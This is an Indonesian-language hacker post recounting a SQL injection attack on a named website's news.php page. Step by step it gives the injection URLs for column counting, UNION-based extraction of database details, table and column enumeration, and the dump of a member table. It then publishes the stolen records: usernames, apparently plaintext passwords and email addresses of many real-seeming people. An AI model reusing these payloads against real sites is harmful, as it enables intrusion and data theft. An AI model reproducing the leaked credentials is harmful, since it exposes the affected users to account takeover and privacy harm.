disini -> http://ccs.my/news.php?id=1561
test error :
http://ccs.my/news.php?id=1561′
yup ada error kita coba uji
: D
1. Memeriksa jumlah Field Tabel
ketemu disini :
http://ccs.my/news.php?id=1561+order+by+6–
ya karena di num 7 posisi udah false :p
2. Mengeluarkan nomor Field
ketemu disini :
http://ccs.my/news.php?id=null+union+all+select+1,2,3,4,5,6–
3. mengeluarkan informasi dari versi mysql, nama database dan nama user
http://ccs.my/news.php?id=-1561+union+all+select+1,2,concat_ws(0×2B,version(),database(),user()),4,5,6++from+information_schema.tables+where+table_schema=database()–
4. mengeluarkan nama-nama tabel
http://ccs.my/news.php?id=-1561+union+all+select+1,2,group_concat(table_name),4,5,6++from+information_schema.tables+where+table_schema=database()–
5. mengeluarkan nama field dari tabel yang menyimpan UserID dan Password pengguna
http://ccs.my/news.php?id=-1561+union+all+select+1,2,group_concat(column_name),4,5,6+from+information_schema.columns+where+table_name=0×6d656d626572
disini aku ambel dari member
6. mengeluarkan record-record dari tabel member
http://ccs.my/news.php?id=-1561+union+all+select+1,2,group_concat(username,0×3a,password,0×3a,email,0×3a,member),4,5,6+from+member+–
Bingo….
cwtan:213:cwtan@myccs.com:on,fkyoon:jk45gb:fkyoon@myccs.com:,xtremecom:hasegawa:klwong@lycos.com:0,kevinloh:nbv354:lohwm@varitronix.com.my:,jasonwong:vgb54n:eljkmw@pd.jaring.my:,jeffery_yeoh:sc8bq1:jeffery_yeoh@yahoo.com:0,gtlau:fv62bx:gtlau@myccs.com:0,johan:ndxm532:johan.knaepen@flits-its.be:0,mohamed:hdx43n:mohamedabdulla@msn.com:0,johnathan:jsch82d:tong_hai@hotmail.com:0,jamesgoh:s45xh2:James_Goh@maxis.net.my:0,sean:dsc23:sean@pdaexpert.info:0,phchan:ph118:poh_hoon_chan@dell.com:,pccmy:suc51f:info@pccmy.com:0,ckphuah:s45f8:ckphuah@hotmail.com:0,cg-computers:hdxe45:licg@cgcomputers.com:0,armen:h2dz52:evergreen_holidays@usa.com:,matthew:sc25×3:easycam@pd.jaring.my:0,kyzee:ds5jk7:acheronz@hotmail.com:,george:dh9n2m:georgechang79@yahoo.com:0,wooijin:wooijin:wooijin@yahoo.com:,raymond-liew:sf28b:raymond@parade-asiapac.com:0,andrewgark:sc19nv:andrewgark@hotmail.com:0,jamil:sdc739:jamil@koptech.com.my:0,irene_tew:kxn349:mtc_irene03@yahoo.com:0,chenlung:xun329:clcher@yahoo.co.jp:0,ericlim:un39xv:ericlimlh@pd.jari
thanks to :
Nocki Aka Mad’on, Temen2 Di arabhack@dal.nyet, Mainhack Brotherhood&temen2 di indohackerlink@dal.nyet&all my friends
special to mami :* love u mam